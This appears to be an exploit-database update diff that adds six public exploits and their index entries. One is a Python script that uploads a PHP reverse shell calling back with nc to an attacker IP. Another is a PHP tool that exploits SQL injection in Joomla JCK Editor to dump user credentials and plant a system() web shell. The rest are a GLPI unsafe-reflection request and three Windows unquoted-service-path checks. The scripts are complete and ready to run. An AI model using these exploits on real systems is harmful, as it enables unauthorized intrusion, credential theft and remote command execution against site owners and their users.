DB: 2021-03-09

6 changes to exploits/shellcodes

Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path
Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path
Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path
Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)
Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
GLPI 9.5.3 - 'fromtype' Unsafe Reflection

exploits/php/webapps/49625.py

@@ -0,0 +1,57 @@
+# Exploit Title: Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)
+# Date: 07-03-2021
+# Exploit Author: Christian Vierschilling
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
+# Version: 1.0
+# Tested on: PHP 7.4.14, Linux x64_x86
+
+# --- Description --- #
+
+# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
+# Executing this script against a target might return a reverse php shell.
+
+# --- Proof of concept --- #
+
+#!/usr/bin/python3
+import random
+import sys
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+
+def file_upload(target_ip, attacker_ip, attacker_port):
+  print("(+) Setting up reverse shell php file ..")
+  random_file_name = str(random.randint(100000, 999999)) + "revshell.php"
+  revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
+  m = MultipartEncoder(fields={'image': (random_file_name, revshell_string, 'application/x-php'),'btn_update':''})
+  print("(+) Trying to upload it ..")
+  r1 = requests.post('http://{}/hotel/source code/profile.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
+  r2 = requests.get('http://{}/hotel/source code/uploadImage/Profile/'.format(target_ip))
+  if random_file_name in r2.text:
+    print("(+) File upload seems to have been successful!")
+    return random_file_name
+  else:
+    print("(-) Oh noes, file upload failed .. quitting!")
+    exit()
+
+def trigger_shell(target_ip, random_file_name):
+  print("(+) Now trying to trigger our shell..")
+  r3 = requests.get('http://{}/hotel/source code/uploadImage/Profile/{}'.format(target_ip, random_file_name))
+  return None
+
+def main():
+  if len(sys.argv) != 4:
+    print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
+    print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
+    sys.exit(-1)
+
+  target_ip = sys.argv[1]
+  attacker_ip = sys.argv[2]
+  attacker_port = sys.argv[3]
+
+  revshell_file_name = file_upload(target_ip, attacker_ip, attacker_port)
+  trigger_shell(target_ip, revshell_file_name)
+  print("\n(+) done!")
+
+if __name__ == "__main__":
+  main()

exploits/php/webapps/49627.php

@@ -0,0 +1,407 @@
+# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
+# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
+# Date: 05/03/2021
+# Exploit Author: Nicholas Ferreira
+# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
+# Version: 6.4.4
+# Tested on: Debian 10
+# CVE : CVE-2018-17254
+# PHP version (exploit): 7.3.27
+# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
+
+<?php
+
+$vuln_file = '/editors/jckeditor/plugins/jtreelink/dialogs/links.php';
+
+function payload($str1, $str2=""){
+	return '?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,'.$str1.',NULL,NULL,NULL,NULL,NULL'.$str2.'--%20aa'; #"
+}
+
+
+function get_request($url){
+    $ch = curl_init();
+    curl_setopt($ch, CURLOPT_URL, $url);
+    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
+	#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080");
+    $output = curl_exec($ch);
+    curl_close($ch);
+    return $output;
+}
+
+function parse_columns($columns){
+	$parsed_columns = array();
+	foreach($columns as $col){
+		array_push($parsed_columns, $col);
+		array_push($parsed_columns, "0x242324"); //delimiter = $#$
+	}
+	return $parsed_columns;
+}
+
+function inject($url, $payload){
+	global $vuln_file;
+	$request = get_request($url.$vuln_file.$payload);
+	preg_match_all('/url ="(.*)">/', $request, $output);
+	return $output;
+}
+######
+
+function is_vulnerable($url){
+	global $vuln_file;
+	$output = inject($url, payload("0x6861636b6564"));
+	if(isset($output[1][0])){
+		if(base64_encode($output[1][0]) == "aGFja2Vk"){ //checking if we can inject
+			return 1;
+		}
+	}
+	return 0;
+}
+
+function get_db_names($url){
+	global $vuln_file;
+	$db_names = array();
+	$output = inject($url, payload("schema_name", "%20from%20information_schema.schemata"));
+	foreach($output[1] as $db){
+		array_push($db_names, $db);
+	}
+	return $db_names;
+}
+
+function get_table_names($url, $db){
+	global $vuln_file;
+	$table_names = array();
+	$output = inject($url, payload("table_name", "%20from%20information_schema.tables%20WHERE%20table_schema=%27".$db."%27"));
+	foreach($output as $table){
+		array_push($table_names, $table);
+	}
+	return $table_names;
+}
+
+function get_column_names($url, $table){
+	global $vuln_file;
+	$column_names = array();
+	$output = inject($url, payload("column_name", "%20from%20information_schema.columns%20WHERE%20table_name=%27".$table."%27"));
+	foreach($output as $column){
+		array_push($column_names, $column);
+	}
+	return $column_names;
+}
+
+function dump_columns($url, $columns, $dbname, $table){
+	global $vuln_file;
+	$column_dump = array();
+	$related_arr = array();
+	$data = array();
+	$output = inject($url, payload("concat(".implode(',', parse_columns($columns)).")", "%20from%20".$dbname.".".$table));
+	foreach($output[1] as $column){
+		$exploded = explode("$#$", $column);
+		array_push($data, $exploded);
+	}
+	foreach($data as $user_info){
+		array_pop($user_info);
+		array_push($related_arr, array_combine($columns, $user_info));
+	}
+	return $related_arr;
+}
+
+function rce($url){	//probably won't work =(
+	global $vuln_file;
+	if(!is_vulnerable($url)){
+		die(red("[-] Target isn't vulnerable."));
+	}
+	$server_root = array("/var/www/", "/var/www/html/", "/usr/local/apache2/htdocs/", "/var/www/nginx-default/", "/srv/www/", "/usr/local/apache2/htdocs/");
+	$rand_content = "AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2";
+	$payl0ad = "'<?php system(\$_GET[0]); ?> ".$rand_content."'";
+	$filename = rand(1000, 7359).".php";
+	echo cyan("[i]")." Trying to upload a RCE shell...\n";
+	foreach($server_root as $path){
+		inject($url, payload($payl0ad, " INTO OUTFILE '".$path.$filename."'"));
+	}
+	$get_shell = get_request($url."/".$filename);
+	if(strpos($get_shell, $rand_content) !== false){
+		echo green("[+] RCE shell successfully uploaded! =)\n");
+		die("Usage: ".$url."/".$filename."?0=whoami\n");
+	}else{
+		echo(red("[-] ")."Could not upload RCE shell. Maybe stacked queries are not supported. =(\n");
+		die(cyan("[i] ")."But you can still inject SQL commands! What about dumping the users table? =)\n");
+	}
+}
+
+function read_file($url, $file){
+	global $vuln_file;
+}
+
+############
+
+function green($str){
+	return "\e[92m".$str."\e[0m";
+}
+function red($str){
+	return "\e[91m".$str."\e[0m";
+}
+function yellow($str){
+	return "\e[93m".$str."\e[0m";
+}
+function cyan($str){
+	return "\e[96m".$str."\e[0m";
+}
+
+function banner(){
+	echo "
+   ___  _____  _   __ _____
+  |_  |/  __ \| | / /|  _  \
+    | || /  \/| |/ / | | | | _   _  _ __ ___   _ __    ___  _ _
+    | || |    |    \ | | | || | | || '_ ` _ \ | '_ \  / _ \| '__|
+/\__/ /| \__/\| |\  \| |/ / | |_| || | | | | || |_) ||  __/| |
+\____/  \____/\_| \_/|___/   \__,_||_| |_| |_|| .__/  \___||_|
+                     ".green("Coder: ").yellow("Nicholas Ferreira")." | |
+                                              |_|
+
+";
+}
+$target = 0;
+$rce = 0;
+function check(){
+	global $argv;
+	global $argc;
+	global $target;
+	global $rce;
+	global $target_list;
+	global $save_output;
+	global $verbose;
+	global $less;
+	global $specified_db;
+	$short_args = "u:t:v::h::l::r::d::";
+	$long_args = array("url:","targets::","verbose::","help::","less::","rce::", "db::");
+	$options = getopt($short_args, $long_args);
+
+	if(isset($options['h']) || $argc == 1 || isset($options['help'])){
+		echo "JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254)
+
+	Usage: php ".$argv[0]." -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db]
+
+	-u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/)
+	-h, --help: Help
+	-v, --verbose: Verbose mode (print tables)
+	-l, --less: Less outputs (only Administrator usernames and passwords)
+	-t, --targets: Load a list of targets
+	-r, --rce: Try to upload a RCE shell
+	-d, --db: Specifies the DB to dump
+
+	";
+
+		}
+
+		if(isset($options['u'])){
+			$target = $options['u'];
+		}elseif(isset($options['url'])){
+			$target = $options['url'];
+		}else{
+			$target = "";
+		}
+
+		isset($options['v']) || isset($options['verbose']) ? $verbose = 1 : $verbose = 0;
+		isset($options['l']) || isset($options['less']) ? $less = 1 : $less = 0;
+		isset($options['r']) || isset($options['rce']) ? $rce = 1 : $rce = 0;
+		isset($options['f']) ? $target_list = $options['f'] : $target_list = 0;
+
+		if(isset($options['t'])){
+			$target_list = $options['t'];
+		}elseif(isset($options['targets'])){
+			$target_list = $options['targets'];
+		}else{
+			$target_list = 0;
+		}
+
+		if(isset($options['d'])){
+			$specified_db = $options['d'];
+		}elseif(isset($options['db'])){
+			$specified_db = $options['db'];
+		}else{
+			$specified_db = 0;
+		}
+
+
+		if(strlen($target_list) < 2){
+			if($target !== ""){ // check if URL is ok
+				if(!preg_match('/^((https?:\/\/)|(www\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\/.*)?$/', $target)){
+					die(red("[i] The target must be a URL.\n"));
+				}
+				if(strpos($target, "plugins") == false){
+					die(red("[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\n"));
+				}
+			}else{
+				die(cyan("[-] ")."You can get help with -h.\n");
+			}
+		}
+
+		if($target_list !== 0){ //check if target list is readable
+			if(!file_exists($target_list)){
+				die(red("[-] ")."Could not read target list file.\n");
+			}
+		}
+}
+
+
+
+function exploit($url){ // returns users and passwords
+	global $vuln_file;
+	global $verbose;
+	global $rce;
+	global $specified_db;
+	global $less;
+	echo cyan("\n=========================| ".str_replace("plugins", "", $url)." |=========================\n\n\n");
+	echo cyan("[+] ")."Checking if target is vulnerable...\n";
+	if (is_vulnerable($url)){
+		$main_db = inject($url, payload("database()"))[1];
+		$user_table = "";
+		$hostname = inject($url, payload("@@hostname"))[1];
+		$mysql_user = inject($url, payload("user()"))[1];
+		$mysql_version = inject($url, payload("@@version"))[1];
+		$connection_id = inject($url, payload("connection_id()"))[1];
+
+		echo green("[+] Target is vulnerable! =)\n\n");
+		echo cyan("[i] ")."Hostname: ".yellow($hostname[0])."\n";
+		echo cyan("[i] ")."Current database: ".yellow($main_db[0])."\n";
+		echo cyan("[i] ")."MySQL version: ".yellow($mysql_version[0])."\n";
+		echo cyan("[i] ")."MySQL user: ".yellow($mysql_user[0])."\n";
+		echo cyan("[i] ")."Connection ID: ".yellow($connection_id[0])."\n\n";
+
+		if($rce){
+			rce($url);
+		}
+
+
+		echo cyan("[+] ")."Getting DB names...\n";
+		$dbs = get_db_names($url);
+		if(count($dbs) == 0){
+			echo("[-] There are no DBs available on this target. =(\n");
+		}
+
+		$db_list = array();
+		foreach($dbs as $db){
+			$num_table = count(get_table_names($url, $db)[1]);
+			echo green("[+] DB found: ").cyan($db." [".$num_table." tables]")."\n";
+			array_push($db_list, $db);
+		}
+		if($main_db == "" && !$specified_db){
+			echo(red("[-] Could not find Joomla! default DB. Try to dump another DB with -d. \n"));
+		}
+		if($specified_db !== 0){ // if user doesn't specify a custom db
+			echo cyan("\n[+] ")."Getting tables from ".yellow($specified_db)."...\n";
+			$tables = get_table_names($url, $specified_db);
+		}else{
+			foreach($db_list as $new_db){
+				if($new_db !== "test" && strlen(strpos($new_db, "information_schema") !== false) == 0){ // neither test nor i_schema
+					echo cyan("\n[+] ")."Getting tables from ".yellow($new_db)."...\n";
+					$tables = get_table_names($url, $new_db);
+				}
+			}
+		}
+		echo cyan("[+] ").yellow(count($tables[1]))." tables found! \n";
+		if(count($tables[1]) == 0){
+			echo(red("[-] "."Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \n"));
+		}
+
+		foreach($tables[1] as $table){
+			if($verbose) echo $table."\n";
+			if(strpos($table, "_users") !== false){
+				$user_table = $table;
+			}
+		}
+
+		if($user_table == ""){
+			echo(red("[-] Could not find Joomla default users table. Try to find it manually!\n"));
+		}
+
+		echo cyan("[+] ")."Getting columns from ".yellow($user_table)."...\n";
+		$columns = get_column_names($url, $user_table);
+
+		if(count($columns) == 0){
+			echo(red("[-] There are no columns on this table... =(\n"));
+		}
+		if($verbose){
+			echo cyan("[+] ")."Columns found:\n";
+			foreach($columns[1] as $coll){
+				echo $coll."\n";
+			}
+		}
+		echo cyan("[+] ")."Dumping usernames from ".yellow($user_table)."...\n";
+
+		$dump = dump_columns($url, array("id","usertype", "name","username","password","email","lastvisitDate"), $db, $user_table);
+
+		if(is_array($dump) && count($dump) == 0){
+			$new_dump = dump_columns($url, array("id","name","username","password","email","lastvisitDate"), $db, $user_table);
+			if(count($new_dump) == 0){
+				echo(red("[-] This table is empty! =(\n"));
+			}else{
+				$dump = $new_dump;
+				$usertype = 0;
+			}
+		}else{
+			$usertype = 1;
+		}
+		echo cyan("\n[+] ")."Retrieved data:\n";
+		foreach($dump as $user){
+		if($usertype){
+			$adm = strpos($user['usertype'], 'Administrator') !== false;
+		}else{
+			$adm = false;
+		}
+		if($less){
+			if(strpos($user['usertype'], "Administrator") !== false){
+				echo "\n=============== ".green($user['username'])." ===============\n";
+				foreach($user as $key => $data){
+					if(strlen($data) > 0){
+							if($key == "username" || $key == "password" || $adm){
+								echo($key.": ".red($data)."\n");
+							}else{
+								echo($key.": ".$data."\n");
+							}
+					}
+				}
+			}
+
+		}else{
+			echo "\n=============== ".green($user['username'])." ===============\n";
+			foreach($user as $key => $data){
+				if(strlen($data) > 0){
+						if($key == "username" || $key == "password" ||  $adm){
+							echo($key.": ".red($data)."\n");
+						}else{
+							echo($key.": ".$data."\n");
+						}
+					}
+				}
+			}
+
+		}
+
+		echo(green("\nExploit completed! =)\n\n\n"));
+
+	}else{
+		echo(red("[-] Apparently, the provided target is not vulnerable. =(\n\n"));
+		echo(cyan("[i] ")."This may be a connectivity issue. If you're persistent, you can try again.\n");
+	}
+}
+
+
+banner();
+check();
+
+if(strlen($target_list) >1){
+	$targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline
+	foreach($targets as $website){
+		if($rce){
+			rce($target);
+		}else{
+			if(strlen($website) > 1){
+				exploit($website); //multiple targets
+			}
+		}
+	}
+}else{
+	exploit($target); //single target
+}
+
+?>

exploits/php/webapps/49628.txt

@@ -0,0 +1,56 @@
+# Exploit Title: GLPI 9.5.3 - 'fromtype' Unsafe Reflection
+# Date: 2021-02-13
+# Exploit Author: Vadym Soroka @Iterasec https://iterasec.com
+# Vendor Homepage: https://glpi-project.org
+# Software Link: https://github.com/glpi-project/glpi/releases
+# Version: <=9.5.3
+# Tested on:v9.5.3, 2021-02-13
+# Technical advisories:
+# https://github.com/glpi-project/glpi/security/advisories/GHSA-qmw7-w2m4-rjwp
+# https://iterasec.com/cve-2021-21327-unsafe-reflection-in-getitemforitemtype-in-glpi/
+
+
+Impact:
+
+Non-authenticated user can remotely instantiate object of any class existing in the GLPI environment that can be used to carry out malicious attacks, or to start a “POP chain”.
+As an example of direct impact, this vulnerability affects integrity of the GLPI core platform and third-party plugins runtime misusing classes which implement some sensitive operations in their constructors or destructors.
+
+Description:
+
+When passing an existing class (ex: "Glpi\Console\Application" class) as an input of the getItemForItemtype() function new object of this class is created executing its constructor e.g. magic __construct() PHP method if declared.
+When a PHP object gets destroyed, its __destruct() method is executed.
+There are many entry points in the GLPI and its plugins, where untrusted user input is passed to the getItemForItemtype() function missing proper input and authorization checks, so just one example is shown to demonstrate the issue in the dropdownConnect.php as an entry point.
+
+Vulnerable code sample:
+
+--- file dropdownConnect.php:
+if (!isset($_POST['fromtype']) || !($fromitem = getItemForItemtype($_POST['fromtype']))) {
+exit();
+}
+---
+--- file dbutils.class.php, function getItemForItemtype($itemtype)
+if (class_exists($itemtype)) {
+return new $itemtype();
+}
+//handle namespaces
+if (substr($itemtype, 0, \strlen(NS_GLPI)) === NS_GLPI) {
+$itemtype = stripslashes($itemtype);
+if (class_exists($itemtype)) {
+return new $itemtype();
+}
+}
+---
+
+POC/Steps to reproduce:
+
+Issue a request*:
+POST /ajax/dropdownConnect.php HTTP/1.1
+Host: glpi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Connection: close
+Content-Length: 12
+
+fromtype=XXX
+* replacing XXX with a class name existing in the deployed GLPI environment with expected patterns, e.g.:
+GLPI Core: "Glpi\Foo\Bar"
+GLPI Plugins: "PluginFooBar"

exploits/windows/local/49623.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 07-03-2021
+# Vendor Homepage: https://www.oki.com
+# Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46229002&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6
+# Tested Version: 4.4.10
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 8.1 Pro 64 bits
+
+C:\Windows\system32>wmic service get name, displayname, pathname, startmode
+| findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ OKI
+Local Port Manager OpLclSrv C:\Program
+Files\Okidata\Common\Extend3\portmgrsrv.exe Print Job Accounting OkiJaSvc
+C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe Print Job
+Accounting Watch Service OkiWchSvc C:\Program Files\Okidata\Print Job
+Accounting\okwchsvc.exe Print Job Accounting opja0004 opja0004 C:\Program
+Files\Okidata\Print Job Accounting\opja0004.exe
+
+C:\Windows\system32>sc qc OkiJaSvc
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: OkiJaSvc
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Print Job Accounting
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem

exploits/windows/local/49624.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 07-03-2021
+# Vendor Homepage: https://www.oki.com
+# Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46226801&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6
+# Tested Version: 1.6.53
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 8.1 Pro 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+OKI Local Port Manager OpLclSrv C:\Program
+Files\Okidata\Common\extend3\portmgrsrv.exe               Auto
+
+C:\>sc qc OpLclSrv [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO:
+OpLclSrv TIPO: 10 WIN32_OWN_PROCESS TIPO_INICIO: 2 AUTO_START
+CONTROL_ERROR: 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program
+Files\Okidata\Common\extend3\portmgrsrv.exe GRUPO_ORDEN_CARGA: ETIQUETA: 0
+NOMBRE_MOSTRAR: OKI Local Port Manager DEPENDENCIAS:
+NOMBRE_INICIO_SERVICIO: LocalSystem

exploits/windows/local/49626.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 07-03-2021
+# Vendor Homepage: https://pingzapper.com
+# Software Links: https://pingzapper.com/download
+# Tested Version: 2.3.1
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 8.1 Pro 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+Pingzapper Service      PingzapperSvc            C:\Program Files
+(x86)\Pingzapper\PZService.exe               Auto
+
+C:\>sc qc PingzapperSvc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO:
+PingzapperSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START
+CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Pingzapper\PZService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0
+NOMBRE_MOSTRAR : Pingzapper Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO:
+LocalSystem

files_exploits.csv

@@ -11274,6 +11274,9 @@ id,file,description,date,author,type,platform,port
 49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,
 49563,exploits/android/local/49563.txt,"Tasks 9.7.3 - Insecure Permissions",2021-02-15,"Lyhin\'s Lab",local,android,
 49572,exploits/linux/local/49572.txt,"Apport 2.20 - Local Privilege Escalation",2021-02-18,Gr33nh4t,local,linux,
+49623,exploits/windows/local/49623.txt,"Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows,
+49624,exploits/windows/local/49624.txt,"Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows,
+49626,exploits/windows/local/49626.txt,"Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43809,3 +43812,6 @@ id,file,description,date,author,type,platform,port
 49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php,
 49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,
 49622,exploits/multiple/webapps/49622.sh,"Fluig 1.7.0 - Path Traversal",2021-03-05,"Lucas Souza",webapps,multiple,
+49625,exploits/php/webapps/49625.py,"Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-08,"Christian Vierschilling",webapps,php,
+49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,
+49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,